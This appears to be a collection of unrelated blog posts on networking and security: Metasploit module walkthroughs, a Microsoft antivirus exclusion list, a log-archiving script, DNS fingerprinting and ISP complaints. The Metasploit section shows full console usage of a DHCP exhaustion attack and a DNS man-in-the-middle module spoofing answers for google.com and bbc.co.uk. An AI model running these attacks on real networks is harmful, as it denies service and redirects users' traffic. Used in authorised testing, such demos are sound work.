On the of the inner ring is

9ec4c12949a4f31474f299058ce2b22a

Looks like a hash to me.

When you unhash it it says

“USCYBERCOM plans, coordinates, integrates, synchronizes, and conducts activities to: direct the operations and defense of specified Department of Defense information networks and; prepare to, and when directed, conduct full-spectrum military cyberspace operations in order to enable actions in all domains, ensure US/Allied freedom of action in cyberspace and deny the same to our adversaries.”

What a different way to get your mission statement into your logo – without actually putting it there.

He has also created a DNS Man in The Middle module which has been worked on by various people, the last being Wesley McGrew who released his version but never got round to getting it into the Metasploit Framework. The module loads a list of domains to give fake responses for and returns real results for everything else. His work on this was to add the facility to have it reload the config file without a restart by doing a look up on a pre-set domain. He also fixed a couple of minor bugs.

See http://www.digininja.org/metasploit/dns_dhcp_beta.php

Usage

You’ll need to be root to run both modules and for the DHCP module you’ll need to put the interface into promiscious mode before starting the attack so it can hear all the replies to the fake requests. The easiest way to explain how to use them is to just show the modules in use so here they are…

DHCP Exhaustion

msf > use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) > set

Global
======

No entries in data store.

Module: dhcp_exhaustion/exhaust
===============================

  Name        Value
  ----        -----
  DHCPSERVER  255.255.255.255
  SNAPLEN     65535
  TIMEOUT     2

msf auxiliary(exhaust) > run

[*] DHCP attack started
[*] DHCP offer of address: 192.168.0.53
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.54
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.55
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.56
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.57
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.58
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.59
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.60
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.52
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.51
[*] Got the ACK back, IP address allocated successfully
[*] Timeout waiting for OFFER
[*] Got a timeout, assuming DHCP exhausted. You Win
[*] Finished
[*] Auxiliary module execution completed

DNS MiTM

msf > use auxiliary/digininja/dns_mitm/dns_mitm
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name     Value
  ----     -----
  RELOAD   digininja.reload
  SRVHOST  0.0.0.0
  SRVPORT  53

msf auxiliary(dns_mitm) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: FILENAME, REALDNS.
msf auxiliary(dns_mitm) > set FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
FILENAME => /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
msf auxiliary(dns_mitm) > set REALDNS 192.168.0.8
REALDNS => 192.168.0.8
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name      Value
  ----      -----
  FILENAME  /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
  REALDNS   192.168.0.8
  RELOAD    digininja.reload
  SRVHOST   0.0.0.0
  SRVPORT   53

msf auxiliary(dns_mitm) > run
[*] Auxiliary module running as background job
msf auxiliary(dns_mitm) >
[*] Loading hosts file

The hosts file contains a single entry

192.168.0.2 google.com

Now do some look ups, google.com and bbc.co.uk

nslookup
> server localhost
Default server: localhost
Address: ::1#53
Default server: localhost
Address: 127.0.0.1#53
> google.com
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 212.58.224.138

Google is middled but the BBC gets through, now add the BBC to the hosts file

echo "192.168.0.2 bbc.co.uk" >> dns.txt

Refresh the server by looking up the special domain and then check the BBC again

> digininja.reload
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
*** Can't find digininja.reload: No answer
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 192.168.0.2

The BBC is now ours!

You may not use or otherwise export or re-export the Licensed Application except as authorized by United States law and the laws of the jurisdiction in which the Licensed Application was obtained. In particular, but without limitation, the Licensed Application may not be exported or re-exported (a) into any U.S. embargoed countries or (b) to anyone on the U.S. Treasury Department’s list of Specially Designated Nationals or the U.S. Department of Commerce Denied Person’s List or Entity List. By using the Licensed Application, you represent and warrant that you are not located in any such country or on any such list. You also agree that you will not use these products for any purposes prohibited by United States law, including, without limitation, the development, design, manufacture or production of nuclear, missiles, or chemical or biological weapons.

Notice, as I read this clause not only are terrorists — or at least those on terrorist watch lists — prohibited from using iTunes to manufacture WMD, they are also prohibited from even downloading and using iTunes.  So all the Al-Qaeda operatives holed up in the Northwest Frontier Provinces of Pakistan, dodging drone attacks while listening to Britney Spears songs downloaded with iTunes are in violation of the terms and conditions, even if they paid for the music!

That’ll show ‘em…

For computers that are running Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, Windows 2000, Windows XP, Windows Vista, or Windows 7

Do not scan the following files and folders. These files are not at risk of infection. If you scan these files, serious performance problems may occur because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any one of these based on the file name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extensions as the following files:

Microsoft Windows Update or Automatic Update related files

The Windows Update or Automatic Update database file. This file is located in the following folder:
%windir%\SoftwareDistribution\Datastore
Exclude the Datastore.edb file.
The transaction log files. These files are located in the following folder:
%windir%\SoftwareDistribution\Datastore\Logs
Exclude the following files:

Edb*.log

Note The wildcard character indicates that there may be several files.
Res1.log. The file is named Edbres00001.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
Res2.log. The file is named Edbres00002.jrs for Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2.
Edb.chk
Tmp.edb
The following files in the %windir%\security path should be added to the exclusions list:

*.edb
*.sdb
*.log
*.chk

Note If these files are not excluded, security databases are typically corrupted, and Group Policy cannot be applied when you scan the folder. The wildcard character indicates that there may be several files. Specifically, you must exclude the following files:

Edb.chk
Edb.log
*.log
Security.sdb in the <drive>:\windows\security\database folder

Group Policy related files

Group Policy user registry information. These files are located in the following folder:
%allusersprofile%\
Exclude the following file:
NTUser.pol
Group Policy client settings file. These files are located in the following folder:
%Systemroot%\system32\GroupPolicy\
Exclude the following file:
registry.pol

For more information, click the following article numbers to view the articles in the Microsoft Knowledge Base:
951059  (http://support.microsoft.com/kb/951059/ ) On a Windows Server 2003-based computer, registry-based policy settings are unexpectedly removed after a user logs on to the computer
930597  (http://support.microsoft.com/kb/930597/ ) Some registry-based policy settings are lost and error messages are logged in the Application log on a Windows XP-based computer or on a Windows Vista-based computer

For Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers

Because domain controllers provide an important service to clients, the risk of disruption of their activities from malicious code from a virus must be minimized. Antivirus software is the generally accepted way to lessen the risk of virus infection. Install and configure antivirus software so that the risk to the domain controller is reduced as much as possible and so that performance is affected as little as possible. The following list contains recommendations to help you configure and install antivirus software on a Windows Server 2008 R2, Windows Server 2008, Windows Server 2003, or on a Windows 2000 domain controller:

Warning We recommend that you apply the following specified configuration to a test configuration to make sure that in your specific environment it does not introduce unexpected factors or compromise the stability of the system. The risk from too much scanning is that files are inappropriately flagged as having been changed. This results in too much replication in Active Directory. If testing verifies that replication is not affected by the following recommendations, you can apply the antivirus software to the production environment.

Note Specific recommendations from antivirus software vendors may supersede the recommendations in the article.

Antivirus software must be installed on all domain controllers in the enterprise. Ideally, try to install such software on all other server and client systems that have to interact with the domain controllers. It is optimal to catch the virus at the earliest point, such as at the firewall or at the client system where the virus is first introduced. This prevents the virus from ever reaching the infrastructure systems that the clients depend on.
Use a version of antivirus software that is designed to work with Active Directory domain controllers and that uses the correct Application Programming Interfaces (APIs) to access files on the server. Older versions of most vendor software inappropriately change file metadata as it is scanned. This causes the File Replication Service engine to recognize a file change and therefore schedule the file for replication. Newer versions prevent this problem. For more information, click the following article number to view the article in the Microsoft Knowledge Base:
815263  (http://support.microsoft.com/kb/815263/ ) Antivirus, backup, and disk optimization programs that are compatible with the File Replication service
Do not use a domain controller to browse the Web or to perform any other activities that may introduce malicious code.
When you can, do not use the domain controller as a file sharing server. Virus scanning software must be run against all files in those shares, and this can put an unsatisfactory load on the processor and the memory resources of the server
Do not put Active Directory or FRS database and log files on NTFS file system compressed volumes.
For more information, click the following article number to view the article in the Microsoft Knowledge Base:
318116  (http://support.microsoft.com/kb/318116/ ) Issues with Jet Databases on compressed drives
Do not scan the following files and folders. These files are not at risk of infection, and if you include them, this may cause serious performance problems because of file locking. Where a specific set of files is identified by name, exclude only those files instead of the whole folder. Sometimes, the whole folder must be excluded. Do not exclude any of these based on the file-name extension. For example, do not exclude all files that have a .dit extension. Microsoft has no control over other files that may use the same extension as those shown here.

Important This section, method, or task contains steps that tell you how to modify the registry. However, serious problems might occur if you modify the registry incorrectly. Therefore, make sure that you follow these steps carefully. For added protection, back up the registry before you modify it. Then, you can restore the registry if a problem occurs. For more information about how to back up and restore the registry, click the following article number to view the article in the Microsoft Knowledge Base:
322756  (http://support.microsoft.com/kb/322756/ ) How to back up and restore the registry in Windows

Active Directory and Active Directory-related files:

Main NTDS database files. The location of these files is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Database File
The default location is %windir%\ntds. Exclude the following files:
Ntds.dit
Ntds.pat
Active Directory transaction log files. The location of these files is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\Database Log Files Path
The default location is %windir%\ntds. Exclude the following files:
EDB*.log (The wildcard character indicates that there may be several files.)
Res1.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)
Res2.log (The file is named Edbres00001.jrs for Windows Server 2008, and Windows Server 2008 R2.)
Ntds.pat
Note Windows Server 2003 no longer uses the Ntds.pat file.
The NTDS Working folder that is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NTDS\Parameters\DSA Working Directory
Exclude the following files:
Temp.edb
Edb.chk

SYSVOL files:

The File Replication Service (FRS) Working folder that is specified in the following registry key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NtFrs\Parameters\Working Directory
Exclude the following files:
FRS Working Dir\jet\sys\edb.chk
FRS Working Dir\jet\ntfrs.jdb
FRS Working Dir\jet\log\*.log
The FRS Database Log files that are located in the following registry key:
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\DB Log File Directory
The default location is %windir%\ntfrs. Exclude the following files:
FRS Working Dir\jet\log\*.log (if the registry key is not set)
FRS Working Dir\jet\log\edbres00001.jrs (Windows Server 2008, and Windows Server 2008 R2)
FRS Working Dir\jet\log\edbres00002.jrs (Windows Server 2008, and Windows Server 2008 R2)
DB Log File Directory\log\*.log (if the registry key is set)
The Staging folder that is specified in the following registry key and all the Staging folder’s sub-folders:
HKEY_LOCAL_MACHINE\system\currentcontrolset\services\NtFrs\Parameters\Replica Sets\GUID\Replica Set Stage

The current location of the Staging folder and all its sub-folders is the file system reparse target of the replica set staging folders. Staging defaults to the following location:

%systemroot%\sysvol\staging areas

The current location of the SYSVOL\SYSVOL folder and all its sub-folders is the file system reparse target of the replica set root. The SYSVOL\SYSVOL folder defaults to the following location:

%systemroot%\sysvol\sysvol
The FRS Preinstall folder that is in the following location:
Replica_root\DO_NOT_REMOVE_NtFrs_PreInstall_Directory
The Preinstall folder is always open when FRS is running.

In summary, the targeted and excluded list of folders for a SYSVOL tree that is placed in its default location would look similar to the following:

1. %systemroot%\sysvol                                                  Exclude
2. %systemroot%\sysvol\domain                                           Scan
3. %systemroot%\sysvol\domain\DO_NOT_REMOVE_NtFrs_PreInstall_Directory  Exclude
4. %systemroot%\sysvol\domain\Policies                                  Scan
5. %systemroot%\sysvol\domain\Scripts                                   Scan
6. %systemroot%\sysvol\staging                                          Exclude
7. %systemroot%\sysvol\staging areas                                    Exclude
8. %systemroot%\sysvol\sysvol                                           Exclude

If any one of these folders or files have been moved or placed in a different location, scan or exclude the equivalent element.
DFS

The same resources that are excluded for a SYSVOL replica set must also be excluded when FRS is used to replicate shares that are mapped to the DFS root and link targets on Windows Server 2008-based, Windows Server 2003-based, or Windows 2000-based member computers or domain controllers.
DHCP

By default, DHCP files that should be excluded are present in the following folder on the server:
%systemroot%\System32\DHCP
Note You should exclude all files and subfolders that exist in this folder.

The location of DHCP files can be changed. To determine the current location of the DHCP files on the server, check the DatabasePath, DhcpLogFilePath, and BackupDatabasePath parameters under the following registry subkey:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\DHCPServer\Parameters

For Windows Server 2008, Windows Server 2003, and Windows 2000 domain controllers

DNS: You should exclude all files and subfolders that exist in the following folder:
%systemroot%\system32\dns
WINS: You should exclude all files and subfolders that exist in the following folder:
%systemroot%\system32\wins

You can get more info here

http://support.microsoft.com/kb/822158

Before we look at it, my server is running OPENVPN and Uncomplicated Firewall(I’m running Ubuntu Server)

So how does it work?

Firstly we declare that we are using the bash shell using
#!/bin/bash

Next we’re setup some vairables, the first is simply formating the date and calling itself TODAYSDATE,
next we set todays archive to be archive.TODAYSDATE and call its self TODAYS_ARCHIVE

Next we create a directory called archive.TODAYSDATE

Now to the best bit, we start processing the logs
- We extract todays logs out of syslog
- From the extracted logs we extract the firewall (Uncomplicated Firewal/ UFW) logs to a seperate file
- Now extract todays messages log
- From todays extracted logs extract all OPENVPN related logs to a seperate log file
- Extract todays apache access.log and error.log
- Provide us with the currently running processes
- Zip it all up to the /archive/ folder
- back back up a directory level and delete the folder called archive.TODAYSDATE
- Now use mutt to attach the zip file to a email and send it

Now for the script – PLEASE FEEL FREE TO USE

#!/bin/bash
# Script By Liam Somerville, www.rootadmin.co.uk
# Use freely

#####################################################################
#                        Set up the variables
#####################################################################
#Set todays date
TODAYSDATE=`date +”%d-%b-%Y”`

#Format Archive
TODAYS_ARCHIVE=archive.$TODAYSDATE

#####################################################################
#                    Finished setting up Variables
#
#                   Now start processing the log files
#####################################################################

# Make a directory called archive with todays date and change to that direcory
mkdir $TODAYS_ARCHIVE
cd $TODAYS_ARCHIVE

#Write the log files
#Archive todays Syslog, extract all firewall related logs to firewall, then
# extract messages
cat /var/log/syslog | grep “`date +”%b %e” `” > syslog.$TODAYSDATE
cat syslog.$TODAYSDATE | grep UFW > firewall_log.$TODAYSDATE
cat /var/log/messages | grep “`date +”%b %e” `” > messages.$TODAYSDATE
#Process the OPEN VPN Server logs
cat syslog.$TODAYSDATE | grep “ovpn-server” > vpn_server_log.$TODAYSDATE
#
#Proceess Apache Logs
cat /var/log/apache2/error.log | grep “`date +”%b %d” `” > apache_error_log.$TODAYSDATE
cat /var/log/apache2/access.log | grep “`date +”%d/%b” `” > apache_access_log.$TODAYSDATE
#
#Process FTP Logs
cat /var/log/vsftpd.log | grep “`date +”%b %e” `” > ftp_log.$TODAYSDATE
#
# Get a list of currently running process
ps aux > Processes.$TODAYSDATE

# Zip up all the logs and delete todays log
zip /archive/$TODAYS_ARCHIVE.zip *
cd ..
rm -r $TODAYS_ARCHIVE

####################################################################
#                     Now email the zip file
###################################################################
echo | mutt -a /archive/$TODAYS_ARCHIVE.zip -s “Event logs for $TODAYSDATE” you@your.email.address.com

For further information and for customers interested in pre-registration please visit http://www.tescomobileiphone.com/.

For more information on iPhone, please visit www.apple.com/uk/iphone.

More information can be found on Tesco Mobile at http://www.tescomobile.com/

About Tesco Mobile:

Tesco Mobile is a 50:50 joint venture between Tesco and O2. The company sells exclusively Tesco Mobile branded services in Tesco stores, online and through Tesco Direct, across the UK using O2’s technology and network.

Tesco Mobile is also available in the rapidly expanding estate of Tesco Phone Shops which will number over 100 by the end of 2009.

The network gives its customers value, simplicity and choice, offering them award winning, simple, great value Pay as you go and Pay monthly tariffs with rewards such as free credit and Clubcard points.

It is the fastest growing Pay as you go network in 2009 and has been voted as the number one mobile network for customer satisfaction by Which Magazine (May 09).

sudo aptitude install fpdns

This will complete the installation

Using fpdns

fpdns [-c] [-d] [-f] [-p port] [-Q srcaddr] [-r retry] [-s] [-t timeout] [-v] server

Where: server is an ip address or a resolvable name
or ‘-’ to read list of servers from stdin
-c (where appropriate check CH TXT version) [off]
-d (debug) [off]
-f (force check CH TXT version) [off]
-F (maximum forked processes) [10]
-p port (nameserver is on this port) [53]
-Q srcaddr (source IP address) [0.0.0.0]
-r retry (set number of attempts) [1]
-s (short form) [off]
-t time (set query timeout) [5]
-v (show version)

fpdns Examples

BIND Version 8 Example

fpdns -D google.com

fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.38.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.32.10): ISC BIND 8.3.0-RC1 — 8.4.4

BIND Version 9 Example

fpdns -D debianhelp.co.uk

fingerprint (debianhelp.co.uk, 212.67.202.2): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]
fingerprint (debianhelp.co.uk, 212.67.203.246): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]

TinyDNS Example

fpdns ns1.eu.dedicatedserver.com.

fingerprint (ns1.eu.dedicatedserver.com., 213.198.65.226): DJ Bernstein TinyDNS 1.05

Microsoft windows 2003 Example
fpdns -D microsoft.com

fingerprint (microsoft.com, 207.68.160.190): Microsoft Windows DNS 2003
fingerprint (microsoft.com, 65.54.240.126): Microsoft Windows DNS 2003

Today i suprised my self, I can still stubnet in my head. I was asked by one of the guys from another team if i new what a /25 subnet was. and off the top of my head before i even stood to try and work it out, the answer had left my mouth.

Quite impressed with my self,

Heads up – Juniper are offering free exams at the momment. Think i might do that. We will see.

Bewteen the hours of 8PM and 11PM customers will notice that the following traffic is restricted and will run slower

File-sharing:

• BitTorrent
• Blubster
• Gnutella
• KaZaA
• WinMX_6688
• WinMX_6699
• eDonkey
• Filetopia
• eDonkey_UDP
• Hotline
• Hotline_1234
• DirectConnect
• GuruGuru
• Soribada
• Soulseek
• Ares
• Rodi
• JoltID
• eMule_UDP
• Waste
• Konspire2b
• ExoSee
• FurthurNet
• MUTE
• GNUnet
• Nodezilla

Newsgroups:

• NNTP
• NNTPS
• TAC_News
• Audio_News
• NTalk
• NetNews
• NAS
• DDI
• Giganews

The problem i see with this is that alot of letgitimate traffic in the linux community is over bit torrent, a lot of applications are distributed over torrents.

Yet again another 02 business dicates its ruling, stuff their customers. – HERE’S  NEW IDEA, UPGRADE YOUR NETWORK.

02 Currently have only 400, 000 customers, so how come other ISP’s manage just fine? Yet another reason why 02 will not see any of my business, im just fed up with their dicatatorship!

Full 02 ruling here http://broadband.o2.co.uk/home/traffic.jsp

As of January 10, 2009, Secunia reports 142 vulnerabilities in Internet Explorer 6, 22 of which are unpatched, some of which are rated moderately critical in severity.

“Microsoft has underlined support for its Internet Explorer 6 web browser, despite acknowledging its flaws.

The software giant said it would support IE6 until 2014 – four years beyond the original deadline.

Critics – some of which have started an online campaign – want the eight-year-old browser mothballed because they claim it slows the online experience.

“Friends do not let friends use IE6,” said Amy Barzdukas, Microsoft’s general manager for Internet Explorer.

“If you are in my social set and I have been to your house for dinner, you are not using IE6,” she said. “But it is much more complicated when you move into a business setting.”

“It’s hard to be cavalier in this economy and say ‘oh it’s been around for so long they need to upgrade,’” Ms Barzdukas told journalists in San Francisco..

Web monitoring firms estimate that 15-20% of people still use IE6 to browse the web.

Enough is enough

Among those speaking out against IE6 is a group of more than 70 developers who have banded together to form a project called ie6nomore.” – http://news.bbc.co.uk/1/hi/technology/8196242.stm

Why not take a look at IE6NoMore